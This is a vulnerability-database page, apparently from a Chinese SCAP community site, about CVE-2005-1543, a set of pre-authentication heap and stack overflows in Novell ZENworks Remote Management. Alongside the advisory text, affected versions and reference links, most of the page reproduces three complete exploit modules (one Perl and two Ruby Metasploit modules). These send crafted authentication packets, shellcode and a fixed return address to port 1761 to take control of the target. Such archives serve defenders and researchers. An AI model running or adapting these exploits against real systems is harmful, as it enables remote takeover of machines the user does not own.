CVE-2005-1543
CVSS7.5
发布时间 :2005-05-25 00:00:00
修订时间 :2016-10-17 23:20:38
NMCOEPS    

[原文]Multiple stack-based and heap-based buffer overflows in Remote Management authentication (zenrem32.exe) on Novell ZENworks 6.5 Desktop and Server Management, ZENworks for Desktops 4.x, ZENworks for Servers 3.x, and Remote Management allows remote attackers to execute arbitrary code via (1) unspecified vectors, (2) type 1 authentication requests, and (3) type 2 authentication requests.


[CNNVD]Novell ZENworks多个远程溢出漏洞(CNNVD-200505-1199)

        Novell ZENworks是远程管理大型网络的工具。
        Novell ZENworks的认证协议存在多个远程溢出漏洞,攻击者可能利用此漏洞获取主机的控制。
        ZENworks在管理远程节点时使用认证协议核实请求者。这个认证协议中存在几个堆和栈溢出漏洞,起因是未经检查的拷贝值,符号滥用和整数封装。远程未经认证的攻击者可以利用这些漏洞完全控制请求认证的系统。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:novell:zenworks_servers:3.2Novell ZENworks for Servers 3.2
cpe:/a:novell:zenworks:6.5Novell ZENworks Desktop Management 6.5
cpe:/a:novell:zenworks_desktops:4.0Novell ZENworks for Desktops 4.0
cpe:/a:novell:zenworks_remote_managementNovell ZENworks Remote Management
cpe:/a:novell:zenworks_server_management:6.5Novell ZENworks Server Management 6.5
cpe:/a:novell:zenworks_desktops:4.0.1Novell ZENworks for Desktops 4.0.1
cpe:/a:novell:zenworks_desktops:3.2:sp2Novell ZENworks for Desktops 3.2 SP2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1543
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1199
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111645317713662&w=2
(UNKNOWN)  BUGTRAQ  20050518 NOVELL ZENWORKS MULTIPLE =?utf-8?Q?REM=C3=98TE?= STACK & HEAP OVERFLOWS
http://securitytracker.com/id?1014005
(UNKNOWN)  SECTRACK  1014005
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10097644.htm
(UNKNOWN)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/10097644.htm
http://www.rem0te.com/public/images/zen.pdf
(VENDOR_ADVISORY)  MISC  http://www.rem0te.com/public/images/zen.pdf
http://www.securityfocus.com/bid/13678
(UNKNOWN)  BID  13678
http://www.vupen.com/english/advisories/2005/0571
(UNKNOWN)  VUPEN  ADV-2005-0571
http://xforce.iss.net/xforce/xfdb/20639
(UNKNOWN)  XF  novell-zenwork-remote-management-bo(20639)
http://xforce.iss.net/xforce/xfdb/20644
(UNKNOWN)  XF  novell-zenwork-remote-management-1-bo(20644)
http://xforce.iss.net/xforce/xfdb/20645
(UNKNOWN)  XF  novell-zenwork-remote-management-2-bo(20645)

- 漏洞信息

Novell ZENworks多个远程溢出漏洞
高危 缓冲区溢出
2005-05-25 00:00:00 2005-10-20 00:00:00
远程  
        Novell ZENworks是远程管理大型网络的工具。
        Novell ZENworks的认证协议存在多个远程溢出漏洞,攻击者可能利用此漏洞获取主机的控制。
        ZENworks在管理远程节点时使用认证协议核实请求者。这个认证协议中存在几个堆和栈溢出漏洞,起因是未经检查的拷贝值,符号滥用和整数封装。远程未经认证的攻击者可以利用这些漏洞完全控制请求认证的系统。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://support.novell.com/security-alerts

- 漏洞信息 (1150)

ZENworks 6.5 Desktop/Server Management Remote Stack Overflow (EDBID:1150)
windows remote
2005-08-12 Verified
1761 n/a
N/A [点击下载]
#
#

package Msf::Exploit::zenworks_desktop_agent;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors' =>
	  [
		'Anonymous',
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winxp', 'win2k', 'win2003' ],
	'Priv'  => 1,

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 1761 ],
	  },
	  
	'Payload' =>
	  {
		'Space'     => 0x7FFF,
		'BadChars'  => "\x00",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a heap overflow in the Novell ZENworks
        Desktop Management agent.
}),

	'Refs'  =>
	  [
		['BID', 13678],
	  ],  
	 
	'Targets' =>
	  [
		[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
	  ],
	  
	'Keys'  => ['zenworks'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self        = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
		return;
	}

        my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
        $self->PrintLine( "[*] Sending version identication" );
	$s->Send($req);

        my $ident = $s->Recv(-1, 16);
        if (length($ident) != 16)
        {
         $self->PrintLine( "[*] Failed to receive agent version identication" );
         return;
        }
        else
        {
         $self->PrintLine( "[*] Received agent version identication" );
        }

        $req = "\x00\x01";
        $self->PrintLine( "[*] Sending client acknowledgment" );
	$s->Send($req);

        # stack overflow in ZenRem32.exe / ZENworks Server Management

	$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
        $self->PrintLine( "[*] Sending authentication data (including shellcode)" );
        $s->Send($req);

	$s->Recv(2, 2);
	$s->Send("\x00\x01");
        
        #$s->Recv(2, 2);
        #my $len = $s->Recv(2,2);
        #$len = unpack ('n', $len);
        #$s->Recv($len, $len);
	
        $s->Send("\x00\x02");

        $self->PrintLine( "[*] Sending final payload" );

        # pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
	my $crash = "A" x 0x20;
	$req = "\x00\x24" . $crash . pack('V', $target->[1]);
        $s->Send($req);
	    
	$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
	select(undef, undef, undef, 4);

	$self->Handler($s);
        return;
}

1;

# milw0rm.com [2005-08-12]
		

- 漏洞信息 (16815)

Novell ZENworks 6.5 Desktop/Server Management Overflow (EDBID:16815)
windows remote
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: zenworks_desktop_agent.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
			'Description'    => %q{
					This module exploits a heap overflow in the Novell ZENworks
				Desktop Management agent. This vulnerability was discovered
				by Alex Wheeler.
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2005-1543'],
					[ 'OSVDB', '16698'],
					[ 'BID', '13678'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 32767,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
						{
							'Platform' => 'win',
							'Ret'      => 0x10002e06,
						},
					],
				],
			'DisclosureDate' => 'May 19 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect

		hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
		print_status("Sending version identification")
		sock.put(hello)

		pad   = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
		ident = sock.get_once
		if !(ident and ident.length == 16)
			print_error("Failed to receive agent version identification")
			return
		end

		print_status("Received agent version identification")
		print_status("Sending client acknowledgement")
		sock.put("\x00\x01")

		# Stack buffer overflow in ZenRem32.exe / ZENworks Server Management
		sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")

		ack = sock.get_once
		sock.put("\x00\x01")
		sock.put("\x00\x02")

		print_status("Sending final payload")
		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))

		print_status("Overflow request sent, sleeping for four seconds")
		select(nil,nil,nil,4)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83038)

Novell ZENworks 6.5 Desktop/Server Management Overflow (PacketStormID:F83038)
2009-11-26 00:00:00
anonymous  metasploit.com
exploit,overflow
CVE-2005-1543
[点击下载]

This Metasploit module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
			'Description'    => %q{
				This module exploits a heap overflow in the Novell ZENworks
				Desktop Management agent. This vulnerability was discovered
				by Alex Wheeler.
					
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1543'],
					[ 'OSVDB', '16698'],
					[ 'BID', '13678'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 32767,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[
						'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
						{
							'Platform' => 'win',
							'Ret'      => 0x10002e06,
						},
					],
				],
			'DisclosureDate' => 'May 19 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect
		
		hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
		print_status("Sending version identification")
		sock.put(hello)
		
		pad   = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
		ident = sock.get_once
		if !(ident and ident.length == 16)
			print_status("Failed to receive agent version identification")
			return
		end
		
		print_status("Received agent version identification")
		print_status("Sending client acknowledgement")
		sock.put("\x00\x01")
		
		# Stack overflow in ZenRem32.exe / ZENworks Server Management
		sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")
		
		ack = sock.get_once
		sock.put("\x00\x01")
		sock.put("\x00\x02")
		
		print_status("Sending final payload")
		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
		
		print_status("Overflow request sent, sleeping for four seconds")
		sleep(4)
		
		handler
		disconnect
	end
	
end
    

- 漏洞信息

16698
Novell ZENworks Remote Management Authentication Multiple Remote Overflows
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- 漏洞描述

Multiple remote overflows exist in Novell ZENworks. The authentication protocol fails to properly check the sign and length of data received from the network resulting in a heap overflow. Also, the authentication protocol fails to properly check the length of submitted passwords when copying into a fixed-length buffer, resulting in a stack overflow. With a specially crafted request, an attacker can gain control of critical system processes on the target with elevated privileges, resulting in a loss of confidentiality and integrity.

- 时间线

2005-05-19 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Novell ZENworks Multiple Remote Pre-Authentication Buffer Overflow Vulnerabilities
Boundary Condition Error 13678
Yes No
2005-05-18 12:00:00 2009-07-12 02:56:00
Discovery of this vulnerability is credited to Alex Wheeler.

- 受影响的程序版本

Novell ZENworks Server Management 6.5
Novell ZENworks Remote Management
Novell ZENworks for Servers 3.2
Novell ZENworks for Desktops 4.0.1
Novell ZENworks for Desktops 4.0
Novell ZENworks for Desktops 3.2 SP2
Novell ZENworks Desktop Management 6.5

- 漏洞讨论

Novell ZENworks is prone to multiple remote pre-authentication buffer overflow vulnerabilities.

The issues exist in the 'zenrem32.exe' executable and may be exploited by a remote attacker to execute arbitrary code in the context of the affected service.

- 漏洞利用

The zenworks_desktop_agent.pm exploit is available for Metasploit.

- 解决方案

The vendor has released an advisory that acknowledges the reality of these issues. Fixes are pending release.

The vendor has released a beta patch addressing this issue. Please see the referenced technical information document for further information.


Novell ZENworks Remote Management

Novell ZENworks for Desktops 3.2 SP2

Novell ZENworks for Desktops 4.0

Novell ZENworks for Desktops 4.0.1

Novell ZENworks Desktop Management 6.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站